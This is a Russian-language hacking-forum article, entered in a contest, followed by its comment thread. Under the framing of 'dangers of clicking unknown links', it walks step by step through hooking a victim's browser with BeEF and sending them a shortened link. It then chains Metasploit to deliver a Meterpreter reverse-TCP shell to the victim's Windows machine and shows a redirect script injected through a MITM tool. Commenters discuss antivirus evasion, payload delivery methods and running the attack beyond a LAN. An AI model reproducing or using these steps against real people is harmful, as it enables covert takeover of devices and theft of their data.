Статья Опасность перехода по неизвестным URL. Взлом устройств.

Статья для участия в конкурсе на codeby.

Приветствую друзья! Сегодня мы поговорим о всей опасности перехода по URL от неизвестных лиц. Также будет много практики. Надеюсь вам будет интересно. Приступим!

Введение.

Каждый раз когда вы переходите по ссылке от неизвестного вам человека, задумывались ли вы о всей опасности того что вы сделали?
Переходя по ссылке вы можете не подозревать, но на вашем устройстве после перехода могут находится вредоносные программы а ваши персональные данные могут быть похищены. Сегодня мы на примерах убедимся во всей опасности...

  • Первое что может случится при переходе по ссылке это то, что злоумышленник получет доступ к вашим аккаунтам социальных сетей.
Данный метод мы затрагивать не будем. Он был описан мной в цикле статей - Получение доступа к аккаунтам социальных сетей.
  • Могут узнать ваш IP. И если вы думаете что это не страшно, то вы глубоко ошибаетесь.
  • Подгрузить малварь используя exploit pack.
На мой взгляд, это самое серьезное что может произойти. Ну что, меньше теории больше практики)

Подгружаем малварь.

Exploit pack - это своеобразная связка эксплойтов.

К прибольшому сожалению я не буду показывать в этой теме использование exploit pack'а. По той простой причине, что огонь это не игрушка. Но мы все равно завладеем всем устройством пользователя когда он перейдет по ссылке. А поможет нам сегодня beef в связке с metasploit. Этот способ я придумал совсем недавно.

Beef - это фреймворк для проведения XSS атак путем заражения и дальнейшего использования.
Metasploit - фреймворк для поиска и эксплоутации уязвимостей. То есть для проветения тестирования на проникновение.

Запуск beef.

В терминале пишем
Код:
beef-xss
Переходим по ссылке ниже
Теперь нужно авторизироватся. Логин и пароль по умолчанию beef:beef.
Нам нужно чтобы "жертва" выполнила у себя скрипт hook.js
Нужно подгрузить его ей.
http://<ваш ip>:3000/demos/basic.html
Далее сократите ссылку и скиньте пользователю. Как только он переходит по ссылке на панели управления beef в разделе Online browsers появится активный браузер. Это браузер нашего пользователя.
Половина дел сделано. Теперь подключим к нашей работе metasploit. Для этого:
  1. Открываем файл config.yaml у beef. Часто он находится в этой дериктории - /usr/share/beef-xss/
  2. Ищем там раздел extension. У metasploit меняем значение параметра на true
Screenshot_from_2017-35.png
  1. Теперь же открываем файл /usr/share/beef-xss/extensions/metasploit/config.yaml и изменяем значение параметров у callback_host и host.
  2. Запускаем metasploit и пишем следующее
Код:
msf> load msgrpc
Screenshot_from_2017-11-07_11-32-20.png

И снова открываем файл из пункта 3. В pass вписываем получившийся с генерированный пароль. Остается сохранить.
Переходим в /usr/share/beef-xss/ и пишем
Код:
./beef -x
После этого в beef загрузятся exploit'ы.
Теперь нам доступны exploit'ы которые мы тоже подгрузить пользователю и выполнить их. Для начала я хотел бы узнать какая ОС у моего пользователя.

Screenshot_from_2017-11-07_12-03-22.png
И как видно на скриншоте - это windows.
Теперь переходим во вкладку Commands и ищем - msf_ms05_054_onload

Screenshot_from_2017-11-07_11-49-29.png
Выберем payload. Так как у моей "жертвы" windows я выбрал - windows/meterpreter/reverse_tcp
Заполняем все поля.
Теперь открываем msf и пишем
Код:
1. use exploit/multi/handler
2. set payload windows/meterpreter/reverse_tcp
3. set LHOST <your_ip>
4. exploit

Во второй команде пишете название пайлоада который выбрали в beef. Вот и все)
А пользователь всего-то перешел по ссылке.

А что если пользователь придерживается правил "я по незнакомым ссылкам не хожу"? На этот случай у нас имеется еще один ответ. Создаем файл hack.js с таким содержимым:
HTML:
<script>
document.location.href="http://<your ip>:3000/demos/basic.html";
</script>

Запускаем xerosploit. И выбираем:
Код:
scan --> ip жертвы --> injectjs --> run --> путь до hack.js
Далее проделываем выше описанное.Вот так мы взломали не о чем не подозревающего пользователя. Будьте осторожны друзья)

Вывод

Не стоит переходить по ссылкам от незнакомцев, это может нанести критический вред вашему устройству. А представьте себе если залить hook.js на уязвимый к xss веб ресурс? Последствия просто ужасны. Надеюсь вам понравилась данная статья!
 
Последнее редактирование:

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
Они двигают свой ресурс, и не являются нам не партнерами не конкурентами.
И в отличие от нас в их профиль не входит решение проблем новичков безплатно.
Они сделали себе имя и теперь работают по принципу: " хочешь обучится - плати"
Сотрудничество с пентестит думаю возможно если мы будем им выгодным Мое мнение касательно них - они высокомерны... Но постить Лука тут точно не будет. )))
 
  • Нравится
Реакции: Kalina

newbiee

Green Team
28.06.2017
50
70
BIT
0
Они двигают свой ресурс, и не являются нам не партнерами не конкурентами.
И в отличие от нас в их профиль не входит решение проблем новичков безплатно.
Они сделали себе имя и теперь работают по принципу: " хочешь обучится - плати"
Сотрудничество с пентестит думаю возможно если мы будем им выгодным Мое мнение касательно них - они высокомерны... Но постить Лука тут точно не будет. )))
Понял, получается на хабре он постит исключительно ради рекламы
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
Хотелось бы на этот счёт услышать технический разбор от компетентных людей, вроде Ондрика и Даркнод, кого то из Red Team или Grey Team :)
Потому что мнение наших забугорных коллег обратное на этот счёт!
Ну мое мнение по поводу бифа:

Биф (говядина) - да, это инструмент для работы с клиентсайд ( атака на клиента и т.д) Он багат на функционал и имеет много всяких фифтеплюшек для атаки на браузерных пользователей. Ознакомление с его функционалом - не может быть не полезным, НО!!!:
Пик актуальности бифа , по моему мнению припадает где то на 2013-15 года.
Самая его большая проблема заключается в том что ,мы можем играться с жертвой пока открыта вредоносная ссылка в браузере жертвы!
это означает ,что как только страница в браузере закроется - мы теряем сесию с ней, и в панели бифа это отобразится не моментально, а спустя какое то время (примерно 1-2 минуты , если не обновлять страницу в панели управления) и чаще всего мы физически не успеваем подгрузить малварь, а автомодулей в бифе вроде как не помню я. Тоесть что бы жертву хекнуть бифом - ее нужно удержать на странице,ну не знаю какой платный фильм высокого качества на халяву в страницу разшарить.

Что касательно ксеросплоит и инжектирование во время митм атак - тут это возможно если жертва перешла по ссылке http без htts или https уязвим hsts вектору,отключен АВ ,что в наше время уже стает редкостью.

Выводы:
Биф очень богат на функционал но в это же время довольно не удобен в реализации атак,но иследовать его составляющие полезные нагрузки стоит изучить.
В наше время уже популярные более новые векторы подгрузки малвари
например через hta или банальным инжектированием невидемого фрейма как в евил-дроид реализовано. Раньше как способ експлуатации бифа - было инжектирования hook.js на взломаных веб сайтах. Сейчас вместо бифа используют браузерные майнеры.
По этому стоит иногда обращать внимание на подгружаемые js скрипты на ваших любимых сайтах.
 
S

serjAk

Ну мое мнение по поводу бифа:

Биф (говядина) - да, это инструмент для работы с клиентсайд ( атака на клиента и т.д) Он багат на функционал и имеет много всяких фифтеплюшек для атаки на браузерных пользователей. Ознакомление с его функционалом - не может быть не полезным, НО!!!:
Пик актуальности бифа , по моему мнению припадает где то на 2013-15 года.
Самая его большая проблема заключается в том что ,мы можем играться с жертвой пока открыта вредоносная ссылка в браузере жертвы!
это означает ,что как только страница в браузере закроется - мы теряем сесию с ней, и в панели бифа это отобразится не моментально, а спустя какое то время (примерно 1-2 минуты , если не обновлять страницу в панели управления) и чаще всего мы физически не успеваем подгрузить малварь, а автомодулей в бифе вроде как не помню я. Тоесть что бы жертву хекнуть бифом - ее нужно удержать на странице,ну не знаю какой платный фильм высокого качества на халяву в страницу разшарить.

Что касательно ксеросплоит и инжектирование во время митм атак - тут это возможно если жертва перешла по ссылке http без htts или https уязвим hsts вектору,отключен АВ ,что в наше время уже стает редкостью.

Выводы:
Биф очень богат на функционал но в это же время довольно не удобен в реализации атак,но иследовать его составляющие полезные нагрузки стоит изучить.
В наше время уже популярные более новые векторы подгрузки малвари
например через hta или банальным инжектированием невидемого фрейма как в евил-дроид реализовано. Раньше как способ експлуатации бифа - было инжектирования hook.js на взломаных веб сайтах. Сейчас вместо бифа используют браузерные майнеры.
По этому стоит иногда обращать внимание на подгружаемые js скрипты на ваших любимых сайтах.
А если стоит антивирус, он будет блокировать выполнение команд?
[doublepost=1510314697,1510314300][/doublepost]И да, мне кажется отпадает вопрос со временен. Да, быть может 5-10 секунд не хватит. 20-30 вполне. Ведь закачку другой гадости можно автоматизировать.
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
А если стоит антивирус, он будет блокировать выполнение команд?
[doublepost=1510314697,1510314300][/doublepost]И да, мне кажется отпадает вопрос со временен. Да, быть может 5-10 секунд не хватит. 20-30 вполне. Ведь закачку другой гадости можно автоматизировать.
На моем опыте было что у жертвы вылетали алерты про безопасность от АВ при инжектировании трафика.
 
  • Нравится
Реакции: novikov433
S

serjAk

Тут есть статья, где нужно создать exe, который будет доставлять нагрузку, касперский не ругался как на файл, так и на выполнение команд. О чем я хочу сказать. Если дырку удалось просверлить, получится ли выполнить одну команду, которая скачает данный exe, запустит и останется жить в планировщике
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
, мне кажется отпадает вопрос со временен. Да, быть может 5-10 секунд не хватит. 20-30 вполне.
При работе с бифом? Ну поиграйтесь , поэксперементируйте.
Я хотел своим мнением сказать что желаемого рнзультата будет проще достич без бифа , для этого проще будет написать свои заготовки под нужные ситуации
 
  • Нравится
Реакции: serjAk и newbiee
S

serjAk

Ну у меня есть некоторые мысли по этому поводу. Выступлю на конференции, потом постараюсь тут донести инфу.
 
  • Нравится
Реакции: newbiee

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
Тут есть статья, где нужно создать exe, который будет доставлять нагрузку, касперский не ругался как на файл, так и на выполнение команд. О чем я хочу сказать. Если дырку удалось просверлить, получится ли выполнить одну команду, которая скачает данный exe, запустит и останется жить в планировщике
Мы отходим от темы. Ну если я правильно понял - то для закреплении в планировщике нужно еще и привилегии локального админа, обнаружение антивирусами происходит по принципу проверки сигнатур и проверки оперативной памяти иногда. И если сигнатура вредоносного по не будет в базе АВ то все запуститься и отработает. Просверленые дырочки тут не причём.
 
S

serjAk

Мы отходим от темы. Ну если я правильно понял - то для закреплении в планировщике нужно еще и привилегии локального админа, обнаружение антивирусами происходит по принципу проверки сигнатур и проверки оперативной памяти иногда. И если сигнатура вредоносного по не будет в базе АВ то все запуститься и отработает. Просверленые дырочки тут не причём.
Планировщик это так, мысли. Про сигнатуры понятно.
DarkNode, в рамках данного форума, какие методы доставки нагрузки, более актуальны?(По вашему мнению)
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
какие методы доставки нагрузки, более актуальны?
Из числа известных мне, думаю пожалуй Web Delivery (или любая доставка методом дроп "SMB delivery" так же будет в следущей статье про пааершел разписан метод Invoke PE Injection через обфусцированный в бейс-64 через WebDelivery)
Но DLL инжекшн так же имеет место быть, недавно ципанул майнер просто играя в CS 1.6 .
Зашел на сервере - полетели окошки с cmd.exe и потом пол дня удалял майнер с компа.
 
  • Нравится
Реакции: Tihon49 и serjAk
S

serjAk

мдаа. Интересный метод через 1.6. А почему пол дня? Вручную удаляли? Я уже смирился с этим, просто 7 точек восстановления, последние 2 подтираются новыми двумя.
 
P

posion1813

и еще один вопрос, можно ли провернуть подобное не в локалке?
 

newbiee

Green Team
28.06.2017
50
70
BIT
0
и еще один вопрос, можно ли провернуть подобное не в локалке?
Мы уже это тут обсуждали, перечитайте топик. Провернуть то можно, нужо обойти NAT, и мы знаем, как это сделать.
Но толку от этого мало, ты просто не успеешь проэксплуатировать хост, пользователь закроет ссылку раньше, хотя кто знает)
 
  • Нравится
Реакции: nikos

z3r0c10wn

Grey Team
04.09.2017
229
295
BIT
201
Статья на конкурс с описанием техник которым уже лет 5. Ну как то прям.....
 
  • Нравится
Реакции: OMiay

Сергей Попов

Кодебай
30.12.2015
4 718
6 707
BIT
368
Статья на конкурс с описанием техник которым уже лет 5. Ну как то прям.....
Вы, как и любой другой участник codeby, сможете принять участие в голосовании при определении победителя.
 
  • Нравится
Реакции: nikos и z3r0c10wn

PingVinich

Технарь
Green Team
19.03.2017
138
512
BIT
0
Ну мое мнение по поводу бифа:

Биф (говядина) - да, это инструмент для работы с клиентсайд ( атака на клиента и т.д) Он багат на функционал и имеет много всяких фифтеплюшек для атаки на браузерных пользователей. Ознакомление с его функционалом - не может быть не полезным, НО!!!:
Пик актуальности бифа , по моему мнению припадает где то на 2013-15 года.
Самая его большая проблема заключается в том что ,мы можем играться с жертвой пока открыта вредоносная ссылка в браузере жертвы!
это означает ,что как только страница в браузере закроется - мы теряем сесию с ней, и в панели бифа это отобразится не моментально, а спустя какое то время (примерно 1-2 минуты , если не обновлять страницу в панели управления) и чаще всего мы физически не успеваем подгрузить малварь, а автомодулей в бифе вроде как не помню я. Тоесть что бы жертву хекнуть бифом - ее нужно удержать на странице,ну не знаю какой платный фильм высокого качества на халяву в страницу разшарить.

Что касательно ксеросплоит и инжектирование во время митм атак - тут это возможно если жертва перешла по ссылке http без htts или https уязвим hsts вектору,отключен АВ ,что в наше время уже стает редкостью.

Выводы:
Биф очень богат на функционал но в это же время довольно не удобен в реализации атак,но иследовать его составляющие полезные нагрузки стоит изучить.
В наше время уже популярные более новые векторы подгрузки малвари
например через hta или банальным инжектированием невидемого фрейма как в евил-дроид реализовано. Раньше как способ експлуатации бифа - было инжектирования hook.js на взломаных веб сайтах. Сейчас вместо бифа используют браузерные майнеры.
По этому стоит иногда обращать внимание на подгружаемые js скрипты на ваших любимых сайтах.
О, я как раз об HTA сегодня написал.
 
O

OneDollar

Из числа известных мне, думаю пожалуй Web Delivery (или любая доставка методом дроп "SMB delivery" так же будет в следущей статье про пааершел разписан метод Invoke PE Injection через обфусцированный в бейс-64 через WebDelivery)
Но DLL инжекшн так же имеет место быть, недавно ципанул майнер просто играя в CS 1.6 .
Зашел на сервере - полетели окошки с cmd.exe и потом пол дня удалял майнер с компа.
Ждем с нетерпением!
 

Raskolnikov

Green Team
30.07.2017
67
21
BIT
0
Шикарная статья, я бы отдал победу тс

Вопрос: Если я на впс beef запущу, я смогу попасть в интерфейс, если изменю localhost на ip vps?
 

crestfo

Green Team
21.06.2017
15
2
BIT
0
Ребята подскажите, когда дохожу до выбора exploit'a, справа нету списка payload, где я что-то пропустил?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!